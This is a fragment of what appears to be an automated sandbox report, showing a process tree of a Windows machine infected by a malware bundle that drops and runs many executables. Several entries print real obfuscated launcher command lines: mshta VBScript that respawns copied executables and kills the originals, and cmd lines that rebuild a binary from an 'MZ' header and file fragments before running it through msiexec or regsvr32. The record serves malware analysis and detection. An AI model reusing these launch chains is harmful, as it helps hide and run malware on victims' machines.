                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff649169e70,0x7ff649169e80,0x7ff649169e90
                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                            PID:8712
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1600,829449229845493882,11569210853971909220,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6056_694209546" --mojo-platform-channel-handle=1664 /prefetch:8
                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                            PID:8928
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1600,829449229845493882,11569210853971909220,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6056_694209546" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1616 /prefetch:2
                                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                                              PID:8920
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\HXelwU3wbGkO35MbXuLjAWJB.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\HXelwU3wbGkO35MbXuLjAWJB.exe"
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                    PID:5576
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\QtTomCYqZT5_CERVsvDPkLhB.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\QtTomCYqZT5_CERVsvDPkLhB.exe"
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                      PID:5340
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 652
                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                                        PID:5976
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 668
                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                                        PID:1240
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 712
                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                                        PID:956
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 704
                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                                        PID:5808
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 900
                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                                        PID:5592
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\P1oeXVIMwEBlLvYVHnLt9A8C.exe
                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\P1oeXVIMwEBlLvYVHnLt9A8C.exe"
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                      PID:3208
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\ZWcj1EwLyKmqmaX2ZonlYCK1.exe
                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\ZWcj1EwLyKmqmaX2ZonlYCK1.exe"
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                      PID:604
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 604 -s 1564
                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                                        PID:948
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\oBMd_NHjZQ2jFxnRDtMQ2hmz.exe
                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\oBMd_NHjZQ2jFxnRDtMQ2hmz.exe"
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                      PID:2532
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS48799D95\Sun0328255c4bce6fb.exe
                                                                                                                                                                                                                                                                                                    Sun0328255c4bce6fb.exe
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                    PID:1976
                                                                                                                                                                                                                                                                                                    • C:\ProgramData\2748842.exe
                                                                                                                                                                                                                                                                                                      "C:\ProgramData\2748842.exe"
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                      PID:2448
                                                                                                                                                                                                                                                                                                    • C:\ProgramData\6630867.exe
                                                                                                                                                                                                                                                                                                      "C:\ProgramData\6630867.exe"
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                      PID:4364
                                                                                                                                                                                                                                                                                                    • C:\ProgramData\2574607.exe
                                                                                                                                                                                                                                                                                                      "C:\ProgramData\2574607.exe"
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                      PID:4808
                                                                                                                                                                                                                                                                                                    • C:\ProgramData\8339321.exe
                                                                                                                                                                                                                                                                                                      "C:\ProgramData\8339321.exe"
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                      PID:4560
                                                                                                                                                                                                                                                                                                    • C:\ProgramData\6486020.exe
                                                                                                                                                                                                                                                                                                      "C:\ProgramData\6486020.exe"
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                      PID:5032
                                                                                                                                                                                                                                                                                                    • C:\ProgramData\1119083.exe
                                                                                                                                                                                                                                                                                                      "C:\ProgramData\1119083.exe"
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                      PID:4972
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS48799D95\Sun03f5d51697d04.exe
                                                                                                                                                                                                                                                                                                    Sun03f5d51697d04.exe
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                    PID:3128
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-5QORQ.tmp\Sun03f5d51697d04.tmp
                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-5QORQ.tmp\Sun03f5d51697d04.tmp" /SL5="$701D2,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS48799D95\Sun03f5d51697d04.exe"
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                      PID:1624
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS48799D95\Sun03f5d51697d04.exe
                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\7zS48799D95\Sun03f5d51697d04.exe" /SILENT
                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                        PID:1288
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS48799D95\Sun0351a0558292.exe
                                                                                                                                                                                                                                                                                                    Sun0351a0558292.exe
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                    PID:2968
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" vbsCRipt: CLoSE( createOBJeCT ( "wsCript.ShelL"). rUn ( "cMD.exE /R tyPe ""C:\Users\Admin\AppData\Local\Temp\7zS48799D95\Sun039750b00c.exe"" > wXE1XgqZIR_W9IM.exE && start WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI & if """" == """" for %m in ( ""C:\Users\Admin\AppData\Local\Temp\7zS48799D95\Sun039750b00c.exe"" ) do taskkill -Im ""%~Nxm"" /F " , 0 , TrUe ) )
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                      PID:3236
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /R tyPe "C:\Users\Admin\AppData\Local\Temp\7zS48799D95\Sun039750b00c.exe" > wXE1XgqZIR_W9IM.exE && start WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI & if "" == "" for %m in ( "C:\Users\Admin\AppData\Local\Temp\7zS48799D95\Sun039750b00c.exe" ) do taskkill -Im "%~Nxm" /F
                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                          PID:1780
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exE
                                                                                                                                                                                                                                                                                                            WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI
                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                            PID:3748
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\mshta.exe" vbsCRipt: CLoSE( createOBJeCT ( "wsCript.ShelL"). rUn ( "cMD.exE /R tyPe ""C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exE"" > wXE1XgqZIR_W9IM.exE && start WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI & if ""-PRt0qXDI7zI "" == """" for %m in ( ""C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exE"" ) do taskkill -Im ""%~Nxm"" /F " , 0 , TrUe ) )
                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                PID:4172
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /R tyPe "C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exE" > wXE1XgqZIR_W9IM.exE && start WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI & if "-PRt0qXDI7zI " == "" for %m in ( "C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exE" ) do taskkill -Im "%~Nxm" /F
                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                    PID:4536
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\mshta.exe" VBSCripT: CLOse ( CReAteoBjECt ( "wScrIPT.SHeLL" ). RuN ( "CmD /C EcHo | sEt /P = ""MZ"" > QKYLkI3.T & CopY /Y /b QKYLkI3.T +KXCn0WxW.e+ 8QfI1D5v.X + 52TbWL.SZV + Y4JTKX.X9 +88N4.I + xU3XyT.P UKHPFGIw.UMV & START msiexec.exe -Y .\UKHPfGIw.UMV " , 0 , TRUe ))
                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                    PID:604
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C EcHo | sEt /P = "MZ" > QKYLkI3.T & CopY /Y /b QKYLkI3.T +KXCn0WxW.e+ 8QfI1D5v.X + 52TbWL.SZV +Y4JTKX.X9 +88N4.I + xU3XyT.P UKHPFGIw.UMV & START msiexec.exe -Y .\UKHPfGIw.UMV
                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                        PID:4760
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                                                            PID:5508
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>QKYLkI3.T"
                                                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                                                              PID:5664
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                              msiexec.exe -Y .\UKHPfGIw.UMV
                                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                              PID:3808
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                        taskkill -Im "Sun039750b00c.exe" /F
                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                        PID:4524
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS48799D95\Sun0397381f1f458e.exe
                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\7zS48799D95\Sun0397381f1f458e.exe" -u
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                    PID:60
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS48799D95\Sun0397381f1f458e.exe
                                                                                                                                                                                                                                                                                                                    Sun0397381f1f458e.exe
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                    PID:3000
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-F4DMK.tmp\Sun03f5d51697d04.tmp
                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-F4DMK.tmp\Sun03f5d51697d04.tmp" /SL5="$10206,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS48799D95\Sun03f5d51697d04.exe" /SILENT
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                      PID:1340
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-9O3TF.tmp\postback.exe
                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-9O3TF.tmp\postback.exe" ss1
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                        PID:4184
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS48799D95\Sun039750b00c.exe
                                                                                                                                                                                                                                                                                                                      Sun039750b00c.exe
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                      PID:3892
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\mshta.exe" vBscRipt: cLosE ( cReAtEOBjEct ( "WsCript.SHEll" ). run ( "CMD /Q/R tYpe ""C:\ProgramData\1119083.exe"" > B6O~DgUD3.exe && STaRt B6O~DGUD3.Exe -P580S5bUuKs9XuzynTIqeOihjj1miW4 &If """"== """" for %q In ( ""C:\ProgramData\1119083.exe"" ) do taskkill /Im ""%~Nxq"" /F " , 0 , tRUE ) )
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                        PID:4732
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /Q/R tYpe "C:\ProgramData\1119083.exe"> B6O~DgUD3.exe && STaRt B6O~DGUD3.Exe -P580S5bUuKs9XuzynTIqeOihjj1miW4 &If ""== "" for %q In ( "C:\ProgramData\1119083.exe" ) do taskkill /Im "%~Nxq" /F
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                            PID:4544
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\B6O~DgUD3.exe
                                                                                                                                                                                                                                                                                                                              B6O~DGUD3.Exe -P580S5bUuKs9XuzynTIqeOihjj1miW4
                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                              PID:4744
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\mshta.exe" vBscRipt: cLosE ( cReAtEOBjEct ( "WsCript.SHEll" ). run ( "CMD /Q/R tYpe ""C:\Users\Admin\AppData\Local\Temp\B6O~DgUD3.exe"" > B6O~DgUD3.exe && STaRt B6O~DGUD3.Exe -P580S5bUuKs9XuzynTIqeOihjj1miW4 &If ""-P580S5bUuKs9XuzynTIqeOihjj1miW4 ""== """" for %q In ( ""C:\Users\Admin\AppData\Local\Temp\B6O~DgUD3.exe"" ) do taskkill /Im ""%~Nxq"" /F " , 0 , tRUE ) )
                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                  PID:5284
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /Q/R tYpe "C:\Users\Admin\AppData\Local\Temp\B6O~DgUD3.exe"> B6O~DgUD3.exe && STaRt B6O~DGUD3.Exe -P580S5bUuKs9XuzynTIqeOihjj1miW4 &If "-P580S5bUuKs9XuzynTIqeOihjj1miW4 "== "" for %q In ( "C:\Users\Admin\AppData\Local\Temp\B6O~DgUD3.exe" ) do taskkill /Im "%~Nxq" /F
                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                      PID:5324
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" vbsCRIPT: CLoSE ( CReatEObjEcT ("wScrIpt.SHELL" ). ruN ( "CMd.EXe /C EcHO | seT /p = ""MZ"" > BUlFE9.O &COPy /Y /B BULfE9.O +Ex4B.0N + YhF_KD.0AY + CkU2MNF.E + 1Cv7G1M.a + TI18H.SI YHK89k.eSL & sTart regsvr32.exe /u /S .\YHK89k.eSL " , 0, TRUE ) )
                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                      PID:2280
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C EcHO | seT /p = "MZ" > BUlFE9.O &COPy /Y /B BULfE9.O +Ex4B.0N + YhF_KD.0AY + CkU2MNF.E + 1Cv7G1M.a + TI18H.SI YHK89k.eSL & sTart regsvr32.exe /u /S .\YHK89k.eSL
                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                          PID:6092
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" EcHO "
                                                                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                                                                              PID:4884
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>BUlFE9.O"
                                                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                                                                PID:5936
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                                                                                                                                regsvr32.exe /u /S .\YHK89k.eSL
                                                                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                PID:6072
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                          taskkill /Im "1119083.exe" /F
                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                          PID:5136
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                      PID:5376
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                          PID:5932
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                        PID:5400
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                            PID:5672
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                          PID:2176
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                              PID:4924
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\ApplicationFrameHost.exe
                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\ApplicationFrameHost.exe -Embedding
                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                              PID:7696
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                              PID:5196
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                              PID:8212
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                              • Enumerates connected drives
                                                                                                                                                                                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                                                                                              PID:8988
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding 266C93CF7FC8C74E0150DFA4DF1185A9 C
                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                  PID:9200
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 04235F72EFBA9277074D0DA01505CF6C
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                  PID:5672
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
